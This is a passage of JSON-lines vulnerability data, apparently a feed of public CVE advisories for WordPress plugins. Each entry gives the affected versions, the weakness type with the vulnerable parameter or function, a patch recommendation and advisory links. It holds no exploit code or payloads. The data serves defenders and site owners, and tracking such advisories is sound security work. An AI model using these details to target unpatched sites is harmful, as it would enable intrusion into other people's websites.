replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordion-slider-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-renderer.php#L172\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordion-slider-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-renderer.php#L172\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordion-slider-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-renderer.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordion-slider-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-renderer.php#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordion-slider-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-slider.php#L310\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordion-slider-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-slider.php#L310\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordion-slider-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-slider.php#L445\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordion-slider-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-slider.php#L445\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordion-slider-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-slider.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordion-slider-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-slider.php#L98\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb386ab5-1fb9-4649-99a6-0e3f971a02f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb386ab5-1fb9-4649-99a6-0e3f971a02f8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12320","slug":"team-rosters","versionImpact":"4.7","description":"The Team Rosters plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018tab\u2019 parameter in all versions up to, and including, 4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-rosters\\\/trunk\\\/includes\\\/mstw-tr-settings.php#L126\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-rosters\\\/trunk\\\/includes\\\/mstw-tr-settings.php#L126\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-rosters\\\/trunk\\\/includes\\\/mstw-tr-settings.php#L54\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-rosters\\\/trunk\\\/includes\\\/mstw-tr-settings.php#L54\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86b85505-8cae-4607-a645-5b127f6f37e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86b85505-8cae-4607-a645-5b127f6f37e7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13578","slug":"wp-bibtex","versionImpact":"3.0.1","description":"The WP-BibTeX plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'WpBibTeX' shortcode in all versions up to, and including, 3.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-bibtex\\\/trunk\\\/wp-bibtex.php#L180\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-bibtex\\\/trunk\\\/wp-bibtex.php#L180\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2011db9d-7237-4843-8c15-63b8fb60de5d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2011db9d-7237-4843-8c15-63b8fb60de5d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13922","slug":"product-import-export-for-woo","versionImpact":"2.6.0","description":"The Order Export & Order Import for WooCommerce plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the admin_log_page() function in all versions up to, and including, 2.6.0. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary log files on the server.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-import-export-for-woocommerce\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L248\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-import-export-for-woocommerce\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L248\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258567\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258567\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-import-export-for-woo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-import-export-for-woo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4eb8f85f-656a-4e5a-a57d-7289da2cd951?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4eb8f85f-656a-4e5a-a57d-7289da2cd951?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5590","slug":"responsive-owl-carousel","versionImpact":"1.9","description":"The Owl carousel responsive plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018id\u2019 parameter in all versions up to, and including, 1.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-owl-carousel\\\/trunk\\\/query\\\/db_gallery.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-owl-carousel\\\/trunk\\\/query\\\/db_gallery.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-owl-carousel\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-owl-carousel\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1f230f5-d40c-43b2-82f2-c920dca9707f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1f230f5-d40c-43b2-82f2-c920dca9707f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7835","slug":"ithoughts-advanced-code-editor","versionImpact":"1.2.10","description":"The iThoughts Advanced Code Editor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.10. This is due to missing or incorrect nonce validation on the 'ithoughts_ace_update_options' AJAX action. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ithoughts-advanced-code-editor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ithoughts-advanced-code-editor\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e99ed03f-ed0a-4f17-b9fe-db0a0e573ed2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e99ed03f-ed0a-4f17-b9fe-db0a0e573ed2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0340","slug":"custom-content-shortcode","versionImpact":"4.0.2","description":"The Custom Content Shortcode WordPress plugin through 4.0.2 does not validate one of its shortcode attributes, which could allow users with a contributor role and above to include arbitrary files via a traversal attack. This could also allow them to read non-PHP files and retrieve their content. RCE could also be achieved if the attacker manages to upload a malicious image containing PHP code and then include it via the affected attribute; on a default WP install, authors could easily achieve that given that they have the upload_file capability.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71956598-90aa-4557-947a-c4716674543d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71956598-90aa-4557-947a-c4716674543d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2066","slug":"bulletin-announcements","versionImpact":"3.6.0","description":"The Announcement & Notification Banner \u2013 Bulletin plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the 'bulletinwp_update_bulletin_status', 'bulletinwp_update_bulletin', 'bulletinwp_update_settings', 'bulletinwp_update_status', 'bulletinwp_export_bulletins', and 'bulletinwp_import_bulletins' functions in versions up to, and including, 3.6.0. This makes it possible for authenticated attackers with subscriber-level access, and above, to modify the plugin's settings, modify bulletins, create new bulletins, and more.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d242a466-0611-4e64-8145-29f64100e62b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d242a466-0611-4e64-8145-29f64100e62b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2906036\\\/bulletin-announcements\\\/trunk\\\/classes\\\/class-bulletinwp-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2906036\\\/bulletin-announcements\\\/trunk\\\/classes\\\/class-bulletinwp-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulletin-announcements\\\/trunk\\\/classes\\\/class-bulletinwp-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulletin-announcements\\\/trunk\\\/classes\\\/class-bulletinwp-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3105","slug":"sfwd-lms","versionImpact":"4.6.0","description":"The LearnDash LMS plugin for WordPress is vulnerable to Insecure Direct Object References in versions up to, and including, 4.6.0. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for attackers with existing account access at any level to change user passwords and potentially take over administrator accounts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2318b3e1-268d-45fa-83bf-c6e88f1b9013?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2318b3e1-268d-45fa-83bf-c6e88f1b9013?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.learndash.com\\\/release-notes\\\/\",\"name\":\"https:\\\/\\\/www.learndash.com\\\/release-notes\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4505","slug":"ldap-ad-staff-employee-directory-search","versionImpact":"1.2.3","description":"The Staff \/ Employee Business Directory for Active Directory plugin for WordPress is vulnerable to LDAP Passback in versions up to, and including, 1.2.3. This is due to insufficient validation when changing the LDAP server. This makes it possible for authenticated attackers, with administrative access and above, to change the LDAP server and retrieve the credentials for the original LDAP server.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ldap-ad-staff-employee-directory-search\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ldap-ad-staff-employee-directory-search\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/medium.com\\\/%40cybertrinchera\\\/cve-2023-4506-cve-2023-4505-ldap-passback-on-miniorange-plugins-ca7328c84313\",\"name\":\"https:\\\/\\\/medium.com\\\/%40cybertrinchera\\\/cve-2023-4506-cve-2023-4505-ldap-passback-on-miniorange-plugins-ca7328c84313\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ea40b96-4693-4f98-8e6e-2ed8186cedd8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ea40b96-4693-4f98-8e6e-2ed8186cedd8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0975","slug":"wordpress-access-control","versionImpact":"4.0.13","description":"The WordPress Access Control plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.0.13 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's \"Make Website Members Only\" feature (when unset) and view restricted page and post content.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31f13524-2bd7-4157-b378-455ac4f822a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31f13524-2bd7-4157-b378-455ac4f822a1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-access-control\\\/trunk\\\/wordpress-access-control.php#L289\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-access-control\\\/trunk\\\/wordpress-access-control.php#L289\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1311","slug":"brizy","versionImpact":"2.4.40","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the storeImages function in all versions up to, and including, 2.4.40. This makes it possible for authenticated attackers, with contributor access or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc023c1b-7ec6-45b6-b50a-f0d823065843?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc023c1b-7ec6-45b6-b50a-f0d823065843?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/editor\\\/zip\\\/archiver.php#L254\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/editor\\\/zip\\\/archiver.php#L254\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034945\\\/brizy\\\/tags\\\/2.4.41\\\/editor\\\/zip\\\/archiver.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034945\\\/brizy\\\/tags\\\/2.4.41\\\/editor\\\/zip\\\/archiver.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3580","slug":"popup4phone","versionImpact":"1.3.2","description":"The Popup4Phone WordPress plugin through 1.3.2 does not sanitise and escape some of its settings, which could allow high privilege users such as Editor to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31f401c4-735a-4efb-b81f-ab98c00c526b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31f401c4-735a-4efb-b81f-ab98c00c526b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0972","slug":"buddypress-members-only","versionImpact":"3.3.5","description":"The BuddyPress Members Only plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.3.5 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's \"All Other Sections On Your Site Will be Opened to Guest\" feature (when unset) and view restricted page and post content.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcfead67-d75d-46ae-ac68-a34643ac2f52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcfead67-d75d-46ae-ac68-a34643ac2f52?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress-members-only\\\/trunk\\\/buddypress-members-only.php#L682\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress-members-only\\\/trunk\\\/buddypress-members-only.php#L682\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9106","slug":"wechat-social-login","versionImpact":"1.3.0","description":"The Wechat Social login plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.3.0. This is due to insufficient verification on the user being supplied during the social login. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id. This is only exploitable if the app secret is not set, so it has a default empty value.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bd44471-1a9c-4465-a52a-be64d51e7ea1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bd44471-1a9c-4465-a52a-be64d51e7ea1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wechat-social-login\\\/trunk\\\/add-ons\\\/social-qq\\\/class-xh-social-channel-qq.php?rev=2080785#L284\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wechat-social-login\\\/trunk\\\/add-ons\\\/social-qq\\\/class-xh-social-channel-qq.php?rev=2080785#L284\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10079","slug":"easy-post-types","versionImpact":"1.4.4","description":"The WP Easy Post Types plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.4.4 via deserialization of untrusted input from the 'text' parameter in the 'ajax_import_content' function. This allows authenticated attackers, with subscriber-level permissions and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d038f1a2-4755-417f-965d-508b57c05738?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d038f1a2-4755-417f-965d-508b57c05738?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L1318\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L1318\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11874","slug":"grid-accordion-lite","versionImpact":"1.5.1","description":"The Grid Accordion Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'grid_accordion' shortcode in all versions up to, and including, 1.5.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-accordion-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-renderer.php#L172\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-accordion-lite\\\/tags\\\/1.5.1\\\/public\\\/class-accordion-renderer.php#L172\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-accordion-lite\\\/tags\\\/1.5.1\\\/public\\\/class-grid-accordion.php#L310\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-accordion-lite\\\/tags\\\/1.5.1\\\/public\\\/class-grid-accordion.php#L310\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-accordion-lite\\\/tags\\\/1.5.1\\\/public\\\/class-grid-accordion.php#L445\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-accordion-lite\\\/tags\\\/1.5.1\\\/public\\\/class-grid-accordion.php#L445\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-accordion-lite\\\/tags\\\/1.5.1\\\/public\\\/class-grid-accordion.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-accordion-lite\\\/tags\\\/1.5.1\\\/public\\\/class-grid-accordion.php#L98\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fc20069-5c1d-481a-b0fd-6f29ed6b41ee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fc20069-5c1d-481a-b0fd-6f29ed6b41ee?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13577","slug":"cats-job-listings","versionImpact":"2.0.9","description":"The CATS Job Listings plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'catsone' shortcode in all versions up to, and including, 2.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cats-job-listings\\\/trunk\\\/CATSJobListingUser.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cats-job-listings\\\/trunk\\\/CATSJobListingUser.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c0af593-2674-484a-a6a5-715f6fb488cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c0af593-2674-484a-a6a5-715f6fb488cf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13921","slug":"users-customers-import-export-for-wp-woocommerce","versionImpact":"2.6.0","description":"The Order Export & Order Import for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.6.0 via deserialization of untrusted input from the 'form_data' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-import-export-for-woocommerce\\\/trunk\\\/admin\\\/modules\\\/export\\\/classes\\\/class-export-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-import-export-for-woocommerce\\\/trunk\\\/admin\\\/modules\\\/export\\\/classes\\\/class-export-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-import-export-for-woocommerce\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-import-export-for-woocommerce\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258567\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258567\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5fcfa21-b3f7-4241-a931-9708ced4f811?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5fcfa21-b3f7-4241-a931-9708ced4f811?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5588","slug":"image-editor-by-pixo","versionImpact":"2.3.6","description":"The Image Editor by Pixo plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018download\u2019 parameter in all versions up to, and including, 2.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-editor-by-pixo\\\/trunk\\\/frontend.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-editor-by-pixo\\\/trunk\\\/frontend.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3315303\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3315303\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/image-editor-by-pixo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/image-editor-by-pixo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1036a34d-ec03-4bec-8455-02c83fdb8b36?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1036a34d-ec03-4bec-8455-02c83fdb8b36?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
